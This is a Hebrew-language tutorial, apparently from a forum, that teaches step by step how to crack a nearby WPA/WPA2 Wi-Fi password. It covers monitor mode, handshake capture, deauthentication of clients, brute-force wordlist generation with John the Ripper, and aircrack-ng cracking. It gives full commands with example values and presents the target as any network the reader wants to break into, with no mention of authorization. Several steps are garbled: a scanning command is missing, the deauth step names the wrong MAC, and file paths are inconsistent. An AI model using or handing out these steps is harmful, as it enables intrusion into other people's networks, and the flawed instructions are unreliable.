פרק 2-פריצת רשתות
חלק 2- פריצת WPA/WPA2
אז אתם זוכרים מה למדנו בפעם הקודמת? יופי היום נלמד משהו שקצת יותר קשה לפרוץ, בשביל זה נשתמש בקובץ ססמאות, אם אין לכם קובץ ססמאות, אל תדעגו אני ילמד אתכם אין להכין אחד בלי לשבת שעות על גבי שעות לכתוב אחד בשביל(ומי המטומטם שיעשה זאת? XD) אז נתחיל, אתם כבר מכירים את התהליך...
נפעיל את wlan0:
קוד:
airmon-ng start wlan0
עכשיו כמו במדריך הקודם המוניטור wlan0 עובד על מוניטור וירטואלי: mon0...
עכשיו אנחנו רוצים לראות את כל הרשתות שקיימות מסביבנו:
ועוצרים את זה ע"י CTRL+C...
כמצאתם את הרשת מתחילים בפעולה, הפעולה הרבה יותר ארוכה ומסובכת.
עכשיו נלך לקונסול שוב ונרשום:
קוד:
airodump-ng mon0 --channel (channel) --bssid (bssid) -w /tmp/wpa
עכשיו נסביר:
במקום ה(channel) רושמים את מה שבעמודה של ch תחת הטור בפקודה הקודמת שבא נמצאת הרשת שעליה אתם רוצים לפרוץ, לדוגמא 6.
במקום ה-(bssid) רושמים את המאק של הרשת שאתם רוצים לפרוץ, זה נמצא בפקודה הקודמת בעמודה של bssid תחת הטור של הרשת שאתם רוצים לפרוץ לדוגמא ff:ff:ff:ff:ff:ff.
את ה-/tmp/mac אבל לשנות אבל אני לא ממליץ.
אז בסוף הפקודה תראה ככה:
קוד:
airodump-ng mon0 --channel 6 --bssid ff:ff:ff:ff:ff:ff -w /tmp/wpa
אז נמשיך, פותחים קונסול חדש בלי לסגור את הקודם ורושמים שם:
קוד:
aireplay-ng -0 1 -a (bssid) -c (mac) mon0
ב(bssid) אתם יודעים כבר מה לרשום(במקרא שלי ff:ff:ff:ff:ff:ff) וב(mac) רושמים את המאק שלכם, בודקים ע"י הפקודה ifconfig תחת wlan0 ליד HWaddr נגיד ושלי זה 0d:1d:0f:cf:e8:b7....
אז זה יראה ככה:
קוד:
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 0d:1d:0f:cf:e8:b7 mon0
עכשיו הגענו לחלק המעצבן, קובץ ססמאות אז כדי ליצור אחד כזה זה ממש הרבה זמן אבל לכל שניה נוספים איזה מיליון ססמאות ובאמת יותר ממליון ססמאות זה יכול להגיע ל-2 ג'יגה תוך 2 דקות אז צריך לנווט למיקום שבו את שומרים את הקובץ ולשים את העכבר כל 5 שניות על הקובץ כדי לבדוק שהוא לא עלה ליותר מ-5 ג'יגה! אפשר יותר אבל תוודעו שיש לכם מספיק מקום(ככל שזה שוקל יותר כך יותר טוב)...
עכשיו כדי ליצור אחד כזה רושמים:
קוד:
/pentest/passwords/john/john --stdout --incremental:all > wordlist.txt
עכשיו במקום ה-worldlist תבחרו שם אחר או שאם אתם רוצים למקם אותו בעזור אחר אז תמקמו אני ישתמש ב-wordlist.txt בינתיים.
עכשיו כשקובץ הססמאות מוכן לוחצים CRTL+C כדי לסיים את התהליך של יצירת קובץ ססמאות...
עכשיו כשיש לכם אותו תרשמו:
קוד:
aircrack-ng -w wordlist.txt -b (bssid) /tmp/wpa*.cap
במקום ה(bssid) אתם כבר יודעים מה לרשום, במקום ה-wordlist.txt תרשמו את המיקום+שם הקובץ שבחרתם, ובמקום ה:
תרשמו את מש שרשמתם במקום זה בפקודה השילישית. את ה-*.cap תשאירו בלי לשנות!
וזהו יש לכם את הססמא, אם זה לא הצליח סימן שקובץ הססמאות צריך להכיל יותר ססמאות...
בהצלחה וחופשה נעימה 
כאן נגמא הפרק השני 
תהנו